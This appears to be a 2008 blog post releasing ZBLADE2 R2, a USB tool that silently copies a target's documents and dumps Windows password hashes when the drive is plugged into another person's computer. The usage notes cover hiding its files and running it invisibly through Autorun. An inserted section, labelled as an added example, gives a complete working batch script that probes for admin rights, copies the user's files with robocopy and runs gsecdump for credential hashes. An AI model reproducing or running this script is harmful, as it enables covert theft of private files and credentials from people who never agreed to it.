
Friday, March 14, 2008

ZBLADE2 R2 is released!

I have released ZBLADE2 R2, the second revision of my USB Switchblade-inspired information and file dumping tool. This new release weighs in at only 690KB uncompressed, a big improvement over the 1.5MB of the first ZBLADE2 release.

Toolkit changes:
  • ROBOCOPY (from the Win2003 SRK) is now used to perform 1:1 uncompressed file dumps. ZIP compression was dropped to maximize performance.
  • gsecdump replaces fgdump for Windows password hashes. This means the domain logon cache (cachedump, i.e. mscash hashes) dump capability is no longer present, but since mscash hashes are a bitch to crack anyway, I see no present need for fgdump, which is also a much larger program.
  • Various updates to the Nirsoft tools
  • Intelligent detection of the user's admin rights: if the account's rights are insufficient, ZBLADE2 skips the tools that require admin access
  • Intelligent detection of the user's document root for file dumping: the local My Documents folder or a domain-based network home drive
  • Packaged as a WinRAR SFX installer. Yay, noob friendly!

Usage
  • Download (see below)
  • Run the installer and select your USB drive. It must be installed to the root of the drive (selecting a subfolder will NOT work).
  • Plug the ZBLADE2-equipped drive into a target Windows 2000/XP/Vista computer. Admin privileges (on Vista, an elevated admin token) are only required for gsecdump; every other component (including the file dumper!) works regardless of account privileges.
  • Many computers have Autorun enabled, so an AutoPlay window should pop up: select "Open this device". This is the recommended method, and it is completely invisible.
  • If Autorun is disabled and no window pops up, open the USB drive from My Computer and start kickstart.cmd (a command prompt flashes for maybe a split second, but everything afterward is completely invisible).
  • All of ZBLADE2's files (with the exception of kickstart.cmd) are hidden, unless Windows Explorer is set to show hidden files.
  • ZBLADE2's information and file dumping is limited by the capacity of your USB device.
  • The running time is largely determined by how many files are to be dumped, as well as the write speed of your USB device. This can be anywhere from a few seconds to several minutes.
Accessing Dumps after a Successful Run
  • Go to a safe place.
  • Make sure Windows Explorer can see hidden files. Go to the ZBLADE2\dumps folder. Click the dump folder that corresponds to the name of the targeted computer.
  • There will be several text files containing information from the various dumping programs. See info.txt for some general information about the dump.
  • The files folder contains the target user's dumped files. Inside is a 1:1 replication of the user's folder structure.
  • By default, only these file types are copied (see Customization below to modify): *.doc *.docx *.xls *.xlsx *.txt *.rtf *.pdf
Customization
  • See ZBLADE2\prgm\run.cmd. This is the main batch script. At the top you can customize the file types to dump (use * for all files if you have a fast and fat drive).
  • More 1337 people might want to take a look at the remaining code and modify it to suit their needs.
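To make the pieces described above concrete, here is a batch script in the same spirit. It is an added example written for this page, not ZBLADE2's own run.cmd (which is not reproduced here): it probes for admin rights and only then runs the hash dump, picks the document root (domain home share if one is mapped, otherwise the registered My Documents folder), performs a 1:1 uncompressed ROBOCOPY dump of the configured file types into dumps\<computername>\files, and writes info.txt. The folder layout, the temp-file name used for the admin probe, the robocopy switches and the gsecdump -a flag are assumptions; adjust them to whatever your toolkit actually ships.

```batch
@echo off
setlocal EnableExtensions
:: Added example (not ZBLADE2's run.cmd). Assumed to live at <USB root>\ZBLADE2\prgm\
:: with gsecdump.exe and robocopy.exe beside it or on the PATH.

:: --- Customizable: file types to dump (use * for everything) ---
set "TYPES=*.doc *.docx *.xls *.xlsx *.txt *.rtf *.pdf"

:: %~dp0 is this script's folder; one level up is ZBLADE2\, so dumps live at ZBLADE2\dumps\<computer>
set "PRGM=%~dp0"
set "DUMP=%PRGM%..\dumps\%COMPUTERNAME%"
if not exist "%DUMP%\files" mkdir "%DUMP%\files"

:: --- Admin probe: only administrators can create a file under system32.
:: On Vista this reflects the *current* token, so a non-elevated admin counts as non-admin.
:: (An alternative probe is "net session >nul 2>&1", which needs the Server service.) ---
set "ISADMIN=0"
(echo.>"%SystemRoot%\system32\zb_admincheck.tmp") 2>nul && (
    del /q "%SystemRoot%\system32\zb_admincheck.tmp" 2>nul
    set "ISADMIN=1"
)

:: --- Document root: domain home share if the logon script mapped one, else the
:: "Personal" shell folder from the registry, else the profile default ---
set "DOCROOT="
if defined HOMESHARE set "DOCROOT=%HOMESHARE%"
if not defined DOCROOT for /f "tokens=2,*" %%A in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Personal 2^>nul ^| find /i "Personal"') do set "DOCROOT=%%B"
if not defined DOCROOT set "DOCROOT=%USERPROFILE%\My Documents"

:: --- 1:1 uncompressed file dump with ROBOCOPY (Win2003 Resource Kit) ---
:: /E copies the subfolder tree (including empty folders) so the structure is replicated 1:1,
:: /R:0 /W:0 skips locked files instead of retrying, /NP /NFL /NDL keep the log to errors and a summary.
robocopy "%DOCROOT%" "%DUMP%\files" %TYPES% /E /R:0 /W:0 /NP /NFL /NDL /LOG:"%DUMP%\robocopy.log" >nul
set "RCRESULT=%ERRORLEVEL%"

:: --- Hash dump only when the admin probe passed (gsecdump -a = dump everything; flag assumed) ---
if "%ISADMIN%"=="1" if exist "%PRGM%gsecdump.exe" (
    "%PRGM%gsecdump.exe" -a >"%DUMP%\gsecdump.txt" 2>&1
)

:: --- info.txt: general information about this dump ---
> "%DUMP%\info.txt" (
    echo Computer : %COMPUTERNAME%
    echo User     : %USERDOMAIN%\%USERNAME%
    echo Admin    : %ISADMIN%
    echo DocRoot  : %DOCROOT%
    echo Types    : %TYPES%
    echo Robocopy : exit code %RCRESULT% ^(8 or higher means some files failed to copy^)
    echo When     : %DATE% %TIME%
)
endlocal
```

Two points worth keeping in mind when adapting this: robocopy's exit code is a bitmask, so anything below 8 is a successful run (1 = files copied, 0 = nothing new to copy) and should not be treated as an error; and the reg query parsing relies on the value being REG_SZ under "Shell Folders", which holds on 2000/XP/Vista, whereas the "User Shell Folders" key stores an unexpanded REG_EXPAND_SZ and would need a second expansion step.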

Enough chitchat, go grab your copy of ZBLADE2 R2 while it's hot!

MD5: 777231CA2B5C1636EFD6660A68A45559
